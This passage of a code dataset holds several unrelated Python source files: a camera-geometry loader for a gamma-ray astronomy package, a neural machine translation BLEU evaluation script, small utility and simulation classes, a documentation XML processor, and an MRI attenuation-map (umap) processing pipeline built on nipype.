-------\n    a `CameraGeometry` object\n\n    Examples\n    --------\n\n    >>> geom_ct1 = get_camera_geometry( \"hess\", 1 )\n    >>> neighbors_pix_1 = geom_ct1.pix_id[geom_ct1.neighbors[1]]\n    \"\"\"\n\n    # let's assume the instrument name is encoded in the\n    # filename\n    name = instrument_name.lower()\n    geomfile = get_path('{}_camgeom.fits.gz'.format(name))\n\n    geom = load_camera_geometry_from_file(cam_id, geomfile=geomfile)\n    neigh_list = geom['PIX_NEIG'].data\n    # mask out negative entries, which mark missing neighbors\n    neigh = np.ma.masked_array(neigh_list, neigh_list < 0)\n\n    # put them all in units of M (conversions are automatic)\n    xx = u.Quantity(geom['PIX_POSX'], u.m)\n    yy = u.Quantity(geom['PIX_POSY'], u.m)\n    dd = u.Quantity(geom['PIX_DIAM'], u.m)\n    aa = u.Quantity(geom['PIX_AREA'], u.m ** 2)\n\n    if recalc_neighbors is True:\n        neigh = find_neighbor_pixels(xx.value, yy.value,\n                                     (dd.mean() + 0.01 * u.m).value)\n\n    return CameraGeometry(\n        cam_id=cam_id,\n        pix_id=np.array(geom['PIX_ID']),\n        pix_x=xx,\n        pix_y=yy,\n        pix_area=aa,\n        neighbors=neigh,\n        pix_type='hexagonal'\n    )\n\n\ndef load_camera_geometry_from_file(cam_id, geomfile='chercam.fits.gz'):\n    filetype = get_file_type(geomfile)\n    if filetype == 'fits':\n        return _load_camera_geometry_from_fits_file(cam_id, geomfile)\n\n\ndef _load_camera_geometry_from_fits_file(cam_id, geomfile='chercam.fits.gz'):\n    \"\"\"\n    Read camera geometry from a FITS file with a ``CHERCAM`` extension.\n\n    Parameters\n    ----------\n\n    cam_id : int\n        ID number of camera in the fits file\n    geomfile : str\n        FITS file containing camera geometry in ``CHERCAM`` extension\n\n    Returns\n    -------\n\n    a `CameraGeometry` object\n\n    \"\"\"\n    camtable = Table.read(geomfile, hdu=\"CHERCAM\")\n    geom = camtable[camtable['CAM_ID'] == cam_id]\n    return geom\n\n\ndef 
make_rectangular_camera_geometry(npix_x=40, npix_y=40,\n range_x=(-0.5, 0.5), range_y=(-0.5, 0.5)):\n \"\"\"Generate a simple camera with 2D rectangular geometry.\n\n Used for testing.\n\n Parameters\n ----------\n npix_x : int\n number of pixels in X-dimension\n npix_y : int\n number of pixels in Y-dimension\n range_x : (float,float)\n min and max of x pixel coordinates in meters\n range_y : (float,float)\n min and max of y pixel coordinates in meters\n\n Returns\n -------\n CameraGeometry object\n\n \"\"\"\n bx = np.linspace(range_x[0], range_x[1], npix_x)\n by = np.linspace(range_y[0], range_y[1], npix_y)\n xx, yy = np.meshgrid(bx, by)\n xx = xx.ravel() * u.m\n yy = yy.ravel() * u.m\n\n ids = np.arange(npix_x * npix_y)\n rr = np.ones_like(xx).value * (xx[1] - xx[0]) / 2.0\n nn = find_neighbor_pixels(xx.value, yy.value,\n rad=(rr.mean() * 2.001).value)\n return CameraGeometry(\n cam_id=-1,\n pix_id=ids,\n pix_x=xx * u.m,\n pix_y=yy * u.m,\n pix_area=(2 * rr) ** 2,\n neighbors=nn,\n pix_type='rectangular')\n","sub_path":"ctapipe/io/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"296276797","text":"import torch\nfrom tqdm import tqdm\nfrom train_super import create_model\nfrom configuration import setup_config\nfrom utils import load_vocabularies, load_data, create_prev, clean_sentences, compute_bleu, save_hypotheses\nfrom joeynmt import data\nfrom joeynmt.batch import Batch\nfrom modules.search import beam_search\nimport sacrebleu\nfrom torch.utils.data import DataLoader\nfrom data_prep import BucketingParallelDataLoader, create_batch, batch_to_sentences\nfrom data_prep.constants import UNK_TOKEN, PAD_TOKEN, SOS_TOKEN, EOS_TOKEN\nimport numpy as np\n\ndef main():\n config = setup_config()\n config[\"dev_prefix\"] = \"comparable\"\n vocab_src, vocab_tgt = load_vocabularies(config)\n _, dev_data, _ = load_data(config, vocab_src=vocab_src, vocab_tgt=vocab_tgt)\n\n model, _, validate_fn = create_model(vocab_src, vocab_tgt, config)\n model.to(torch.device(config[\"device\"]))\n\n checkpoint_path = \"{}/cond_nmt_de-en_run_7/checkpoints/cond_nmt_de-en_run_7\".format(config[\"out_dir\"])\n\n state = torch.load(checkpoint_path)\n model.load_state_dict(state['state_dict'])\n\n model.eval()\n device = torch.device(\"cpu\") if config[\"device\"] == \"cpu\" else torch.device(\"cuda:0\")\n with torch.no_grad():\n model_hypotheses = []\n references = []\n\n val_dl = DataLoader(dev_data, batch_size=config[\"batch_size_eval\"],\n shuffle=False, num_workers=4)\n # val_dl = BucketingParallelDataLoader(val_dl)\n for sentences_x, sentences_y in tqdm(val_dl):\n\n sentences_x = np.array(sentences_x)\n seq_len = np.array([len(s.split()) for s in sentences_x])\n sort_keys = np.argsort(-seq_len)\n sentences_x = sentences_x[sort_keys]\n # #\n sentences_y = np.array(sentences_y)\n\n x_in, _, x_mask, x_len = create_batch(sentences_x, vocab_src, device)\n x_mask = x_mask.unsqueeze(1)\n\n if config[\"model_type\"] == \"aevnmt\":\n qz = model.inference(x_in, x_mask, x_len)\n z = qz.mean\n\n enc_output, enc_hidden = model.encode(x_in, x_len, z)\n dec_hidden = model.init_decoder(enc_output, enc_hidden, z)\n\n raw_hypothesis = beam_search(model.decoder, model.emb_tgt,\n model.generate_tm, enc_output, dec_hidden, x_mask, vocab_tgt.size(),\n vocab_tgt[SOS_TOKEN], vocab_tgt[EOS_TOKEN],\n vocab_tgt[PAD_TOKEN], config)\n else:\n enc_output, enc_hidden = model.encode(x_in, x_len)\n dec_hidden = 
model.decoder.initialize(enc_output, enc_hidden)\n\n                raw_hypothesis = beam_search(model.decoder, model.emb_tgt,\n                    model.generate_tm, enc_output, dec_hidden, x_mask, vocab_tgt.size(),\n                    vocab_tgt[SOS_TOKEN], vocab_tgt[EOS_TOKEN],\n                    vocab_tgt[PAD_TOKEN], config)\n\n            hypothesis = batch_to_sentences(raw_hypothesis, vocab_tgt)\n\n            inverse_sort_keys = np.argsort(sort_keys)\n            model_hypotheses += hypothesis[inverse_sort_keys].tolist()\n\n            references += sentences_y.tolist()\n        save_hypotheses(model_hypotheses, 0, config, None)\n        model_hypotheses, references = clean_sentences(model_hypotheses, references, config)\n        bleu = sacrebleu.raw_corpus_bleu(model_hypotheses, [references]).score\n        print(bleu)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"coaevnmt/back_super_de-en.py","file_name":"back_super_de-en.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"109533573","text":"# read n strings and print their longest common prefix\ny=input()\ny=int(y)\na2=[]\nfor j in range(0,y): \n    n1=input()\n    a2.append(n1)\nf1=[]\nfor j in zip(*a2):\n    if j.count(j[0])==len(j): \n        f1.append(j[0])\n    else:\n        break\nprint(''.join(f1))\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"127738185","text":"import os\nimport json\nimport xml.etree.ElementTree as et\nimport errno\nfrom strippers import strip_extension\n\n\n### This file should probably be made into a class, as it's quite messy to define the find_object_category function inside main(). ###\n\ndef main():\n    ### directories ###\n    dir_path = os.path.dirname(os.path.realpath(__file__))\n    object_path = dir_path.replace('/Documentation/Max Documentation', '/FrameLib_Max_Objects')\n    raw_xml_path = f'{dir_path}/RawXML'\n    move_to_path = dir_path.replace('/Documentation/Max Documentation', '/Current Test Version/FrameLib/docs/refpages')\n    category_database_path = f'{dir_path}/category_database.json'\n\n    ### Load the category_database.json ###\n    with open(category_database_path) as raw_json:\n        category_database = json.load(raw_json)\n    \n    ### Get category of file ###\n    def find_object_category(obj_string):\n        for key in category_database:\n            category_object_list = category_database[key] \n            for obj in category_object_list:\n                if obj == obj_string:\n                    return key\n\n    raw_xml_list = os.listdir(raw_xml_path) #make a list with all the raw xml files in them\n\n    ### Complex find and replace ###\n    for i in range(len(raw_xml_list)):\n        if raw_xml_list[i] != '.DS_Store': #filter out annoying hidden files\n            raw_xml_file_path = f'{raw_xml_path}/{raw_xml_list[i]}' #absolute path of this raw xml file\n            obj_name = strip_extension(raw_xml_list[i], 2) #just get the file name\n            category = find_object_category(obj_name) #get the category of the object name\n            tree = et.parse(raw_xml_file_path) #parse the xml file\n            root = tree.getroot() #get root and assign to root var\n            root.set('category', category) #set category attribute of root to the category found in json\n            ### This replaces the meta data tag. 
It produces a lot of errors which are filtered by the try/except structure but it should be changed to something else ###\n if category != None:\n for elem in root.getiterator(): #for all the elements in the root of the xml tree\n try:\n elem.text = elem.text.replace('!@#@#$', category) #try to replace specific text with category found in json\n except AttributeError:\n pass #else pass because it will throw some errors\n if not os.path.exists(f'{move_to_path}/{category}'):\n try:\n os.makedirs(f'{move_to_path}/{category}')\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # if directory is made between os.path.exists and os.makedirs calls this will fail with an OSError. This raises an error to warn the user rather than pushing on\n\n tree.write(f'{move_to_path}/{category}/{raw_xml_list[i]}') #write the xml file out\n","sub_path":"Documentation/Max Documentation/edit_raw_XML.py","file_name":"edit_raw_XML.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"501460828","text":"from constants import *\nimport Generator\n\nclass World(object):\n\n def __init__(self, dimensions=(100, 100)):\n self.dimensions = dimensions\n self.layers = {}\n self.generator = Generator.Generator()\n\n for layer_name in self.generator.generation_order:\n self.add_layer(layer_name)\n\n def add_layer(self, layer_name, contents=None):\n if contents == None:\n self.layers[layer_name] = self.generator.generate(layer_name, self.dimensions, self.layers)\n else:\n self.layers[layer_name] = contents\n\n def get_value(self, x, y, layer_name):\n result = 0\n\n if layer_name in self.layers and self.within_bounds(x, y):\n result = self.layers[layer_name][x][y]\n\n return result\n\n def get_values(self, x, y, layer_names=None):\n if layer_names == None:\n layer_names = self.layers.keys()\n\n return {layer_name: self.get_value(x, y, layer_name) for layer_name in layer_names}\n\n def add_values(self, x, y, args):\n if self.within_bounds(x, y):\n for layer_name in args:\n if not(self.layers.has_key(layer_name)):\n self.add_layer(layer_name)\n\n self.layers[layer_name][x][y] += args[layer_name]\n\n def set_values(self, x, y, args):\n if self.within_bounds(x, y):\n for layer_name in args:\n if not(self.layers.has_key(layer_name)):\n self.add_layer(layer_name)\n\n self.layers[layer_name][x][y] = args[layer_name]\n\n def within_bounds(self, x, y):\n result = False\n if x >= 0 and x < self.dimensions[0] and y >= 0 and y < self.dimensions[1]:\n result = True\n\n return result\n","sub_path":"wogan/World.py","file_name":"World.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"7450459","text":"from ..base import MRIStudy\nfrom arcana.study.base import StudyMetaClass\nfrom arcana.dataset import DatasetSpec, FieldSpec\nfrom nipype.interfaces.fsl.preprocess import FLIRT, ApplyXFM\nfrom nipype.interfaces.fsl.utils import ConvertXFM, Smooth\nfrom nipype.interfaces.fsl.maths import (\n UnaryMaths, BinaryMaths, MultiImageMaths, Threshold)\nfrom nipype.interfaces.spm.preprocess import NewSegment\nfrom nipype.interfaces.utility.base import Select\nfrom nianalysis.interfaces.umap_calc import CoreUmapCalc\nfrom nianalysis.interfaces.converters import Nii2Dicom\nfrom nianalysis.interfaces.mrtrix.utils import MRConvert\nfrom arcana.interfaces.utils import (\n CopyToDir, ListDir, dicom_fname_sort_key)\nfrom arcana.study.multi import (\n MultiStudy, 
SubStudySpec, MultiStudyMetaClass)\nfrom nianalysis.citation import (\n fsl_cite, spm_cite, matlab_cite)\nfrom nianalysis.file_format import (\n dicom_format, nifti_gz_format, nifti_format, text_matrix_format,\n directory_format, text_format)\nfrom nianalysis.requirement import (\n fsl5_req, spm12_req, matlab2015_req)\nfrom nianalysis.interfaces.custom.motion_correction import (\n MotionMatCalculation)\nfrom arcana.parameter import ParameterSpec\n\n\nclass UTEStudy(MRIStudy, metaclass=StudyMetaClass):\n\n add_data_specs = [\n DatasetSpec('umap', dicom_format),\n DatasetSpec('umap_nifti', nifti_gz_format,\n 'umap_dcm2nii_conversion_pipeline'),\n DatasetSpec('brain', nifti_gz_format, 'brain_extraction_pipeline'),\n DatasetSpec('ute_echo1', dicom_format),\n DatasetSpec('ute_echo2', dicom_format),\n DatasetSpec('umap_ute', dicom_format),\n DatasetSpec('ute1_registered', nifti_gz_format,\n 'registration_pipeline'),\n DatasetSpec('ute2_registered', nifti_gz_format,\n 'registration_pipeline'),\n DatasetSpec('template_to_ute_mat', text_matrix_format,\n 'registration_pipeline'),\n DatasetSpec('ute_to_template_mat', text_matrix_format,\n 'registration_pipeline'),\n DatasetSpec('air_mask', nifti_gz_format,\n 'segmentation_pipeline'),\n DatasetSpec('bones_mask', nifti_gz_format,\n 'segmentation_pipeline'),\n DatasetSpec('sute_cont_template', nifti_gz_format,\n 'umaps_calculation_pipeline'),\n DatasetSpec('sute_fix_template', nifti_gz_format,\n 'umaps_calculation_pipeline'),\n DatasetSpec('sute_fix_ute', nifti_gz_format,\n 'backwrap_to_ute_pipeline'),\n DatasetSpec('sute_cont_ute', nifti_gz_format,\n 'backwrap_to_ute_pipeline')]\n\n add_parameter_specs = [\n ParameterSpec('bet_method', 'optibet',\n choices=MRIStudy.parameter_spec('bet_method').choices)]\n\n template_path = '/home/jakubb/template/template_template0.nii.gz'\n tpm_path = '/environment/packages/spm/12/tpm/head_tpm.nii'\n\n def header_info_extraction_pipeline(self, **kwargs):\n return (super(UTEStudy, self).\n header_info_extraction_pipeline_factory(\n 'primary', **kwargs))\n\n def umap_dcm2nii_conversion_pipeline(self, **kwargs):\n return super(UTEStudy, self).dcm2nii_conversion_pipeline_factory(\n 'umap_dcm2nii', 'umap', **kwargs)\n\n def registration_pipeline(self, **kwargs): # @UnusedVariable @IgnorePep8\n \"\"\"\n Register T1 and T2 to the\n\n Parameters\n ----------\n \"\"\"\n pipeline = self.create_pipeline(\n name='registration_pipeline',\n inputs=[DatasetSpec('ute_echo1', dicom_format),\n DatasetSpec('ute_echo2', dicom_format)],\n outputs=[DatasetSpec('ute1_registered', nifti_format),\n DatasetSpec('ute2_registered', nifti_gz_format),\n DatasetSpec('template_to_ute_mat', text_matrix_format),\n DatasetSpec('ute_to_template_mat', text_matrix_format)],\n desc=\"Register ute images to the template\",\n version=1,\n citations=(fsl_cite),\n **kwargs)\n\n echo1_conv = pipeline.create_node(MRConvert(), name='echo1_conv')\n echo1_conv.inputs.out_ext = '.nii.gz'\n\n pipeline.connect_input('ute_echo1', echo1_conv, 'in_file')\n\n echo2_conv = pipeline.create_node(MRConvert(), name='echo2_conv')\n echo2_conv.inputs.out_ext = '.nii.gz'\n\n pipeline.connect_input('ute_echo2', echo2_conv, 'in_file')\n\n # Create registration node\n registration = pipeline.create_node(\n FLIRT(), name='ute1_registration',\n requirements=[fsl5_req], wall_time=180)\n\n pipeline.connect(\n echo1_conv,\n 'out_file',\n registration,\n 'in_file')\n\n registration.inputs.reference = self.template_path\n registration.inputs.output_type = 'NIFTI_GZ'\n 
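# search the full +/-180 degree range on each axis so FLIRT can recover any starting orientation\n        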
registration.inputs.searchr_x = [-180, 180]\n registration.inputs.searchr_y = [-180, 180]\n registration.inputs.searchr_z = [-180, 180]\n registration.inputs.bins = 256\n registration.inputs.cost_func = 'corratio'\n\n # Inverse matrix conversion\n convert_mat = pipeline.create_node(\n ConvertXFM(), name='inverse_matrix_conversion',\n requirements=[fsl5_req], wall_time=10)\n pipeline.connect(\n registration,\n 'out_matrix_file',\n convert_mat,\n 'in_file')\n convert_mat.inputs.invert_xfm = True\n\n # UTE_echo_2 transformation\n transform_ute2 = pipeline.create_node(\n ApplyXFM(), name='transform_t2',\n requirements=[fsl5_req], wall_time=10)\n pipeline.connect(\n registration,\n 'out_matrix_file',\n transform_ute2,\n 'in_matrix_file')\n pipeline.connect(\n echo2_conv,\n 'out_file',\n transform_ute2,\n 'in_file')\n\n transform_ute2.inputs.output_type = 'NIFTI_GZ'\n transform_ute2.inputs.reference = self.template_path\n transform_ute2.inputs.apply_xfm = True\n\n # Connect outputs\n pipeline.connect_output('ute1_registered', registration, 'out_file')\n pipeline.connect_output(\n 'ute_to_template_mat',\n registration,\n 'out_matrix_file')\n pipeline.connect_output('ute2_registered', transform_ute2, 'out_file')\n pipeline.connect_output('template_to_ute_mat', convert_mat, 'out_file')\n pipeline.assert_connected()\n\n return pipeline\n\n def segmentation_pipeline(self, **kwargs): # @UnusedVariable @IgnorePep8\n\n pipeline = self.create_pipeline(\n name='ute1_segmentation',\n inputs=[DatasetSpec('ute1_registered', nifti_format)],\n outputs=[DatasetSpec('air_mask', nifti_gz_format),\n DatasetSpec('bones_mask', nifti_gz_format)],\n desc=\"Segmentation of the first echo UTE image\",\n version=1,\n citations=(spm_cite, matlab_cite),\n **kwargs)\n\n segmentation = pipeline.create_node(\n NewSegment(), name='ute1_registered_segmentation',\n requirements=[matlab2015_req, spm12_req], wall_time=480)\n pipeline.connect_input(\n 'ute1_registered',\n segmentation,\n 'channel_files')\n segmentation.inputs.affine_regularization = 'none'\n tissue1 = ((self.tpm_path, 1), 1, (True, False), (False, False))\n tissue2 = ((self.tpm_path, 2), 1, (True, False), (False, False))\n tissue3 = ((self.tpm_path, 3), 2, (True, False), (False, False))\n tissue4 = ((self.tpm_path, 4), 3, (True, False), (False, False))\n tissue5 = ((self.tpm_path, 5), 4, (True, False), (False, False))\n tissue6 = ((self.tpm_path, 6), 3, (True, False), (False, False))\n segmentation.inputs.tissues = [\n tissue1,\n tissue2,\n tissue3,\n tissue4,\n tissue5,\n tissue6]\n\n select_bones_pm = pipeline.create_node(\n Select(), name='select_bones_pm_from_SPM_new_segmentation',\n requirements=[], wall_time=5)\n pipeline.connect(\n segmentation,\n 'native_class_images',\n select_bones_pm,\n 'inlist')\n select_bones_pm.inputs.index = 3\n\n select_air_pm = pipeline.create_node(\n Select(), name='select_air_pm_from_SPM_new_segmentation',\n requirements=[], wall_time=5)\n\n pipeline.connect(\n segmentation,\n 'native_class_images',\n select_air_pm,\n 'inlist')\n select_air_pm.inputs.index = 5\n\n threshold_bones = pipeline.create_node(\n Threshold(), name='bones_probabilistic_map_thresholding',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(select_bones_pm, 'out', threshold_bones, 'in_file')\n threshold_bones.inputs.output_type = \"NIFTI_GZ\"\n threshold_bones.inputs.direction = 'below'\n threshold_bones.inputs.thresh = 0.2\n\n binarize_bones = pipeline.create_node(\n UnaryMaths(), name='bones_probabilistic_map_binarization',\n 
requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n threshold_bones,\n 'out_file',\n binarize_bones,\n 'in_file')\n binarize_bones.inputs.output_type = \"NIFTI_GZ\"\n binarize_bones.inputs.operation = 'bin'\n\n threshold_air = pipeline.create_node(\n Threshold(), name='air_probabilistic_maps_thresholding',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(select_air_pm, 'out', threshold_air, 'in_file')\n threshold_air.inputs.output_type = \"NIFTI_GZ\"\n threshold_air.inputs.direction = 'below'\n threshold_air.inputs.thresh = 0.1\n\n binarize_air = pipeline.create_node(\n UnaryMaths(), name='air_probabilistic_map_binarization',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(threshold_air, 'out_file', binarize_air, 'in_file')\n binarize_air.inputs.output_type = \"NIFTI_GZ\"\n binarize_air.inputs.operation = 'bin'\n\n pipeline.connect_output('bones_mask', binarize_bones, 'out_file')\n pipeline.connect_output('air_mask', binarize_air, 'out_file')\n pipeline.assert_connected()\n\n return pipeline\n\n def umaps_calculation_pipeline(self, **kwargs):\n\n pipeline = self.create_pipeline(\n name='core_umaps_calculation',\n inputs=[DatasetSpec('ute1_registered', nifti_gz_format),\n DatasetSpec('ute2_registered', nifti_gz_format),\n DatasetSpec('air_mask', nifti_gz_format),\n DatasetSpec('bones_mask', nifti_gz_format)],\n outputs=[DatasetSpec('sute_cont_template', nifti_gz_format),\n DatasetSpec('sute_fix_template', nifti_gz_format)],\n desc=\"Umaps calculation in the template space\",\n version=1,\n citations=(matlab_cite),\n **kwargs)\n\n umaps_calculation = pipeline.create_node(\n CoreUmapCalc(), name='umaps_calculation_based_on_masks_and_r2star',\n requirements=[matlab2015_req], wall_time=20)\n pipeline.connect_input(\n 'ute1_registered',\n umaps_calculation,\n 'ute1_reg')\n pipeline.connect_input(\n 'ute2_registered',\n umaps_calculation,\n 'ute2_reg')\n pipeline.connect_input('air_mask', umaps_calculation, 'air__mask')\n pipeline.connect_input('bones_mask', umaps_calculation, 'bones__mask')\n\n pipeline.connect_output(\n 'sute_cont_template',\n umaps_calculation,\n 'sute_cont_template')\n pipeline.connect_output(\n 'sute_fix_template',\n umaps_calculation,\n 'sute_fix_template')\n pipeline.assert_connected()\n\n return pipeline\n\n def backwrap_to_ute_pipeline(self, **kwargs):\n\n pipeline = self.create_pipeline(\n name='backwrap_to_ute',\n inputs=[DatasetSpec('ute1_registered', nifti_gz_format),\n DatasetSpec('ute_echo1', dicom_format),\n DatasetSpec('umap_ute', dicom_format),\n DatasetSpec('template_to_ute_mat', text_matrix_format),\n DatasetSpec('sute_cont_template', nifti_gz_format),\n DatasetSpec('sute_fix_template', nifti_gz_format)],\n outputs=[DatasetSpec('sute_cont_ute', nifti_gz_format),\n DatasetSpec('sute_fix_ute', nifti_gz_format)],\n desc=\"Moving umaps back to the UTE space\",\n version=1,\n citations=(matlab_cite),\n **kwargs)\n\n echo1_conv = pipeline.create_node(MRConvert(), name='echo1_conv')\n echo1_conv.inputs.out_ext = '.nii.gz'\n pipeline.connect_input('ute_echo1', echo1_conv, 'in_file')\n\n umap_conv = pipeline.create_node(MRConvert(), name='umap_conv')\n umap_conv.inputs.out_ext = '.nii.gz'\n pipeline.connect_input('umap_ute', umap_conv, 'in_file')\n\n zero_template_mask = pipeline.create_node(\n BinaryMaths(), name='zero_template_mask',\n requirements=[fsl5_req], wall_time=3)\n pipeline.connect_input(\n 'ute1_registered',\n zero_template_mask,\n 'in_file')\n zero_template_mask.inputs.operation = \"mul\"\n 
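# multiplying the registered UTE image by zero gives an empty template-space volume to build the mask from\n        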
zero_template_mask.inputs.operand_value = 0\n zero_template_mask.inputs.output_type = 'NIFTI_GZ'\n\n region_template_mask = pipeline.create_node(\n FLIRT(), name='region_template_mask',\n requirements=[fsl5_req], wall_time=5)\n region_template_mask.inputs.apply_xfm = True\n region_template_mask.inputs.bgvalue = 1\n region_template_mask.inputs.interp = 'nearestneighbour'\n region_template_mask.inputs.output_type = 'NIFTI_GZ'\n pipeline.connect(\n zero_template_mask,\n 'out_file',\n region_template_mask,\n 'in_file')\n pipeline.connect(\n echo1_conv,\n 'out_file',\n region_template_mask,\n 'reference')\n pipeline.connect_input('template_to_ute_mat', region_template_mask,\n 'in_matrix_file')\n\n fill_in_umap = pipeline.create_node(MultiImageMaths(),\n name='fill_in_umap',\n requirements=[fsl5_req],\n wall_time=3)\n fill_in_umap.inputs.op_string = \"-mul %s \"\n fill_in_umap.inputs.output_type = 'NIFTI_GZ'\n pipeline.connect(region_template_mask, 'out_file',\n fill_in_umap, 'in_file')\n pipeline.connect(\n umap_conv,\n 'out_file',\n fill_in_umap,\n 'operand_files')\n\n sute_fix_ute_space = pipeline.create_node(\n FLIRT(), name='sute_fix_ute_space',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n echo1_conv,\n 'out_file',\n sute_fix_ute_space,\n 'reference')\n pipeline.connect_input('template_to_ute_mat', sute_fix_ute_space,\n 'in_matrix_file')\n pipeline.connect_input('sute_fix_template', sute_fix_ute_space,\n 'in_file')\n sute_fix_ute_space.inputs.apply_xfm = True\n sute_fix_ute_space.inputs.bgvalue = 0\n sute_fix_ute_space.inputs.output_type = 'NIFTI_GZ'\n\n sute_cont_ute_space = pipeline.create_node(\n FLIRT(), name='sute_cont_ute_space',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n echo1_conv,\n 'out_file',\n sute_cont_ute_space,\n 'reference')\n pipeline.connect_input('template_to_ute_mat', sute_cont_ute_space,\n 'in_matrix_file')\n pipeline.connect_input('sute_cont_template', sute_cont_ute_space,\n 'in_file')\n sute_cont_ute_space.inputs.apply_xfm = True\n sute_cont_ute_space.inputs.bgvalue = 0\n sute_cont_ute_space.inputs.output_type = 'NIFTI_GZ'\n\n sute_fix_ute_background = pipeline.create_node(\n MultiImageMaths(), name='sute_fix_ute_background',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n sute_fix_ute_space,\n 'out_file',\n sute_fix_ute_background,\n 'in_file')\n sute_fix_ute_background.inputs.op_string = \"-add %s \"\n sute_fix_ute_background.inputs.output_type = 'NIFTI_GZ'\n pipeline.connect(\n fill_in_umap,\n 'out_file',\n sute_fix_ute_background,\n 'operand_files')\n\n sute_cont_ute_background = pipeline.create_node(\n MultiImageMaths(), name='sute_cont_ute_background',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n sute_cont_ute_space,\n 'out_file',\n sute_cont_ute_background,\n 'in_file')\n sute_cont_ute_background.inputs.op_string = \"-add %s \"\n sute_cont_ute_background.inputs.output_type = 'NIFTI_GZ'\n pipeline.connect(\n fill_in_umap,\n 'out_file',\n sute_cont_ute_background,\n 'operand_files')\n\n smooth_sute_fix = pipeline.create_node(\n Smooth(), name='smooth_sute_fix',\n requirements=[fsl5_req], wall_time=5)\n smooth_sute_fix.inputs.sigma = 2.\n pipeline.connect(\n sute_fix_ute_background,\n 'out_file',\n smooth_sute_fix,\n 'in_file')\n\n smooth_sute_cont = pipeline.create_node(\n Smooth(), name='smooth_sute_cont',\n requirements=[fsl5_req], wall_time=5)\n smooth_sute_cont.inputs.sigma = 2.\n pipeline.connect(\n sute_cont_ute_background,\n 'out_file',\n smooth_sute_cont,\n 'in_file')\n\n 
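# the two smoothed umaps are the final outputs of this pipeline\n        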
pipeline.connect_output('sute_fix_ute', smooth_sute_fix,\n 'smoothed_file')\n pipeline.connect_output('sute_cont_ute', smooth_sute_cont,\n 'smoothed_file')\n pipeline.assert_connected()\n\n return pipeline\n\n# def conversion_to_dicom_pipeline(self, **kwargs):\n#\n# pipeline = self.create_pipeline(\n# name='conversion_to_dicom',\n# inputs=[DatasetSpec('sute_cont_ute', nifti_gz_format),\n# DatasetSpec('sute_fix_ute', nifti_gz_format),\n# DatasetSpec('umap_ute', dicom_format)],\n# outputs=[DatasetSpec('sute_cont_dicoms', dicom_format),\n# DatasetSpec('sute_fix_dicoms', dicom_format)],\n# desc=(\n# \"Conversing resulted two umaps from nifti to dicom format - \"\n# \"parallel implementation\"),\n# version=1,\n# citations=(),\n# parameters=parameters)\n#\n# cont_split = pipeline.create_node(Split(), name='cont_split',\n# requirements=[fsl5_req])\n# cont_split.inputs.dimension = 'z'\n# fix_split = pipeline.create_node(Split(), name='fix_split',\n# requirements=[fsl5_req])\n# fix_split.inputs.dimension = 'z'\n# cont_nii2dicom = pipeline.create_map_node(\n# Nii2Dicom(), name='cont_nii2dicom', iterfield=['in_file',\n# 'reference_dicom'],\n# wall_time=20)\n# fix_nii2dicom = pipeline.create_map_node(\n# Nii2Dicom(), name='fix_nii2dicom', iterfield=['in_file',\n# 'reference_dicom'],\n# wall_time=20)\n# list_dicoms = pipeline.create_node(ListDir(), name='list_dicoms')\n# list_dicoms.inputs.sort_key = dicom_fname_sort_key\n# cont_copy2dir = pipeline.create_node(CopyToDir(),\n# name='cont_copy2dir')\n# cont_copy2dir.inputs.file_ext = '.dcm'\n# fix_copy2dir = pipeline.create_node(CopyToDir(),\n# name='fix_copy2dir')\n# fix_copy2dir.inputs.file_ext = '.dcm'\n# # Connect nodes\n# pipeline.connect(cont_split, 'out_files', cont_nii2dicom, 'in_file')\n# pipeline.connect(fix_split, 'out_files', fix_nii2dicom, 'in_file')\n# pipeline.connect(list_dicoms, 'files', cont_nii2dicom,\n# 'reference_dicom')\n# pipeline.connect(list_dicoms, 'files', fix_nii2dicom,\n# 'reference_dicom')\n# pipeline.connect(cont_nii2dicom, 'out_file', cont_copy2dir,\n# 'in_files')\n# pipeline.connect(fix_nii2dicom, 'out_file', fix_copy2dir, 'in_files')\n# # Connect inputs\n# pipeline.connect_input('sute_cont_ute', cont_split, 'in_file')\n# pipeline.connect_input('sute_fix_ute', fix_split, 'in_file')\n# pipeline.connect_input('umap_ute', list_dicoms, 'directory')\n# # Connect outputs\n# pipeline.connect_output('sute_fix_dicoms', fix_copy2dir, 'out_dir')\n# pipeline.connect_output('sute_cont_dicoms', cont_copy2dir, 'out_dir')\n#\n# pipeline.assert_connected()\n# return pipeline\n # The list of study data_specs that are either primary from the scanner\n # (i.e. 
